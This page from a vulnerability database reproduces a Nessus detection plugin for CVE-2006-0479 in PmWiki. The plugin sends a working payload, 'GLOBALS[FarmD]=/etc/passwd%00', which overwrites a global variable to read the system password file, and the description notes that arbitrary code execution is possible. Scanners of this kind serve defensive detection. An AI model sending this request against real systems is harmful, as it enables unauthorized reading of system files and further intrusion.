Lucene search
K

PmWiki < 2.1 beta 21 Multiple Vulnerabilities

🗓️ 13 Feb 2006 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 25 Views

PmWiki < 2.1 beta 21 Multiple Vulnerabilities. Attacker can overwrite global variables, leading to arbitrary code execution

Related
Refs
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
PmWiki <=2.1 Beta20 Multiple Vulnerabilities
30 Jan 200600:00
nessus
CVE
CVE-2006-0479
31 Jan 200611:00
cve
Cvelist
CVE-2006-0479
31 Jan 200611:00
cvelist
EUVD
EUVD-2006-0486
7 Oct 202500:30
euvd
NVD
CVE-2006-0479
31 Jan 200611:03
nvd
Prion
Cross site scripting
31 Jan 200611:03
prion
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(20891);
  script_version("1.19");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2006-0479");
  script_bugtraq_id(16421);

  script_name(english:"PmWiki < 2.1 beta 21 Multiple Vulnerabilities");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The remote host is running PmWiki, an open source Wiki written in PHP. 

The version of PmWiki installed on the remote host allows attackers to
overwrite global variables if run under PHP 5 with 'register_globals'
enabled.  For example, an attacker can exploit this issue to overwrite
the 'FarmD' variable before it's used in a PHP 'include()' function in
the 'pmwiki.php' script, which can allow him to view arbitrary files
on the remote host and even execute arbitrary PHP code, possibly taken
from third-party hosts.");
  script_set_attribute(attribute:"see_also", value:"http://www.ush.it/2006/01/24/pmwiki-multiple-vulnerabilities/");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2006/Jan/935");
  # http://www.pmichaud.com/pipermail/pmwiki-announce/2006-January/000091.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?33775e7d");
  script_set_attribute(attribute:"solution", value:
"Upgrade to PmWiki 2.1 beta 21 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/01/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/02/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:pmwiki:pmwiki");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/pmwiki", "/wiki", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Try to exploit the flaw to read a file.
  file = "/etc/passwd%00";
  r = http_send_recv3(method:"GET", 
    item:string(
      dir, "/pmwiki.php?",
      "GLOBALS[FarmD]=", file
    ), 
    port:port
  );
  if (isnull(r)) exit(0);
  res = r[2];

  # There's a problem if...
  if (
    # there's an entry for root or...
    egrep(string:res, pattern:"root:.*:0:[01]:") ||
    # we get an error saying "failed to open stream" or "failed opening".
    #
    # nb: this suggests magic_quotes_gpc was enabled but passing
    #     remote URLs might still work.
    egrep(string:res, pattern:"main\(/etc/passwd\\0/scripts/stdconfig\.php.+ failed to open stream") ||
    egrep(string:res, pattern:"Failed opening '/etc/passwd\\0/scripts/stdconfig\.php' for inclusion")
  ) {
    if (report_verbosity > 1) {
      output = res - strstr(res, "<!DOCTYPE html");
      if (isnull(output)) output = res;
      output = data_protection::redact_etc_passwd(output:output);
      report = string(
        "\n",
        output
      );
      security_warning(port:port, extra:report);
    }
    else security_warning(port);

    exit(0);
  }
}


Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Apr 2022 00:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 24.3
EPSS0.03109
25